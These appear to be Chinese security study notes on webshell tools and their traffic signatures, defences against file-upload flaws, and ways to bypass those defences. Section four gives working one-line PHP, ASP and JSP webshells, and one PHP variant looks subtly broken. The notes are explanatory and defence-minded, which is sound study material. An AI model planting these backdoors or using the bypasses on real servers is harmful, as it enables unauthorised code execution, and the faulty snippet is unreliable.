一、三种webshell工具使用
1. 中国蚁剑
蚁剑设置BurpSuite代理,连接
BurpSuite开启抓包,查看流量特征
2. 冰蝎
-
流量特征:
-
不同版本的冰竭流量特征会有区别:
-
3.0流量动态AES加密,一般http包头中content-type为application/octet-stream。
-
4.0流量动态AES加密,一般http包头中content-type为application/x-www-form-urlencoded。
-
-
使用长连接,默认情况下,请求头和响应头里会带有Connection: Keep-Alive。
-
连接的端口,每次连接使用本地端口在49700左右(就是比较大的端口)。
-
Accept:字段中存在 application/json,text/javascript,/;q=0.01。
-
UA头是冰蝎内置的,有规律的 (10种内置UA头,随机选择)大量的aes加密(弱特征)。
-
3. 哥斯拉
-
流量特征:
- 基于流量、HTTP全加密的webshel1工具,看不出有明显的攻击特征,需要结合流量找到哥斯拉webshel1上传成功的流量来进行分析和判断,另外该工具自带了一些插件模块,实现了写无文件 WebShell 等强大的功能,可以伪造UA头和Accept头,消除请求包和响应包中的特征。
- Cookie中有一个非常关键的特征,最后会有个分号。
- 响应体的数据有一定特征,哥斯拉会把一个32位的md5字符串按照一半拆分,分别放在base64编码的数据的前后两部分。
- 整个响应包的结构体征为: md5前十六位+base64+md5后十六位。
- Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp/;g=0.8 (固定的)。
- 哥斯拉会建立三次tcp连接(强特征)。
二、文件上传漏洞防御手段
1. 客户端校验
- 前端JavaScript校验: 在用户上传文件前,使用JavaScript对文件名、文件类型、文件大小等进行初步校验。
- 优点: 提升用户体验,减少服务器压力。
- 缺点: 易被绕过,不能作为唯一防御手段。
2. 服务端校验
- 文件类型校验:
- 白名单机制: 仅允许上传指定类型文件(如.jpg, .png),更安全。
- 黑名单机制: 禁止上传特定类型文件(如.php, .asp),但容易被绕过。
- 文件内容校验:
- MIME Type校验: 检查文件头部的MIME Type信息,但可被伪造。
- 文件内容检测: 使用正则表达式或内容分析工具检测文件内容是否包含恶意代码。
- 文件路径校验:
- 限制上传目录: 将上传目录设置为不可执行,防止脚本执行。
- 随机文件名: 使用随机文件名避免文件名冲突,增加攻击难度。
3. 其他防御措施
- WAF防护: Web应用防火墙可以拦截常见的攻击,如SQL注入、XSS等。
- 入侵检测系统: 监控服务器异常行为,及时发现入侵。
- 定期安全扫描: 定期对系统进行安全扫描,发现并修复漏洞。
- 最小权限原则: 授予Web服务器最小权限,限制其访问文件系统。
- 及时更新系统和组件: 及时修复已知的漏洞。
4. 防御建议
- 多重校验: 结合客户端和服务端校验,提高安全性。
- 动态水印: 在上传图片时添加动态水印,防止篡改。
- 文件格式转换: 将上传的图片转换为其他格式,破坏潜在的恶意代码。
- 沙箱技术: 在沙箱环境中运行上传文件,隔离潜在威胁。
- 安全编码: 编写安全的代码,避免常见的漏洞。
三、文件上传漏洞绕过手段
1. 客户端校验绕过:
- 直接修改前端代码: 通过浏览器开发者工具修改JavaScript代码,绕过客户端校验。
- Burp Suite抓包修改: 使用Burp Suite等代理工具拦截请求,修改请求数据绕过校验。
2. 服务端校验绕过:
- MIME类型绕过: 伪造MIME类型,使服务器误认为上传的是合法文件。
- 文件头检测绕过: 构造特殊的头部信息,绕过文件头检测。
- 文件内容检测绕过:
- 00截断: 利用某些服务器的解析漏洞,通过插入ASCII码为0的字符来截断文件名。
- 大小写绕过: 利用服务器对大小写不敏感的特性,将文件扩展名改为大小写不同的形式。
- 双重扩展名绕过: 添加多个扩展名,欺骗服务器。
- .htaccess绕过: 上传.htaccess文件,修改服务器配置。
- 路径遍历绕过: 利用相对路径或绝对路径,访问服务器上的其他文件或目录。
- 条件竞争绕过: 同时发送多个请求,利用服务器处理请求的延迟,实现文件上传。
3. 服务器配置绕过:
- 服务器解析漏洞: 利用服务器对某些文件类型的解析漏洞,执行恶意代码。
- 目录配置不当: 上传目录具有可执行权限,导致上传的脚本文件可以直接执行。
四、常用的一句话木马
1. PHP
<?php eval($_POST['cmd']); ?>
解释:当接收到POST请求中的cmd参数时,会执行该参数中的PHP代码。
<?php $a = 'system'; $b = '($_POST[cmd])'; $a($b); ?>
解释:将system函数赋值给变量a,以绕过一些简单的检测。
2. ASP
<% eval request("cmd") %>
解释:与PHP类似,执行cmd参数中的ASP代码。
3. JSP
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
解释:使用Java的Runtime类执行命令。
五、文件上传无回显查找webshell地址
检查服务器日志:查看HTTP请求日志,特别是在上传文件失败或成功的记录中,可能会有可疑的URL或文件路径。
异常检测:有些webshell在运行时会抛出错误或异常,通过监控网站的服务器错误页面,寻找异常报告。
文件名检测:如果webshell使用了特殊命名规则,比如包含特定字符组合的文件名,可以在服务器目录下搜索这些文件。
网络扫描:利用安全审计工具在网络流量中查找未授权访问或命令执行的行为。
黑盒测试:尝试向服务器发送各种文件上传请求,看是否有意外响应,这可能暴露webshell的位置。
源码审查:如果有可能,查看网站的后台代码,查看是否存在文件处理漏洞,这是隐藏webshell的常见手段。
权限验证:分析文件上传功能的权限设置,可能存在权限不足但仍能访问敏感目录的情况。
六、文件上传表单的无参/有参情况下构造表单
无参
<form action="upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" accept=".jpg, .jpeg, .png"> <!-- 可限制文件类型 -->
<input type="submit" value="Upload">
</form>
有参
<form action="upload.php" method="post" enctype="multipart/form-data">
<label for="description">File description:</label>
<input type="text" id="description" name="description">
<input type="file" name="fileToUpload" accept=".jpg, .jpeg, .png">
<input type="submit" value="Upload">
</form